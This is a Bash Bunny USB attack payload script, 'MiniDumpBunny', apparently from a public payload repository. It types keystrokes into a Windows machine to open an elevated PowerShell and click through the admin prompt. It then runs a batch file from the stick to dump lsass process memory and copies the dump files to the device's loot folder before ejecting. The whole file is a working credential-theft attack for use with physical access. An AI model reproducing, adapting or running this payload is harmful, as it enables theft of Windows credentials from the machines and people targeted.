43 lines
1.0 KiB
Bash
43 lines
1.0 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: MiniDumpBunny
|
|
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
|
|
# Author: 0i41E
|
|
# Version: 1.0
|
|
# Category: Credentials
|
|
# Attackmodes: HID, Storage
|
|
|
|
LED SETUP
|
|
|
|
Q DELAY 500
|
|
|
|
GET SWITCH_POSITION
|
|
DUCKY_LANG de
|
|
|
|
Q DELAY 500
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
|
|
|
LED STAGE1
|
|
|
|
Q DELAY 1000
|
|
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
|
Q ENTER
|
|
Q DELAY 1000
|
|
Q ALT j
|
|
Q DELAY 250
|
|
|
|
Q DELAY 250
|
|
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')"
|
|
Q DELAY 250
|
|
Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
|
Q DELAY 250
|
|
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
|
Q DELAY 250
|
|
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
|
Q DELAY 300
|
|
Q ENTER
|
|
|
|
LED FINISH |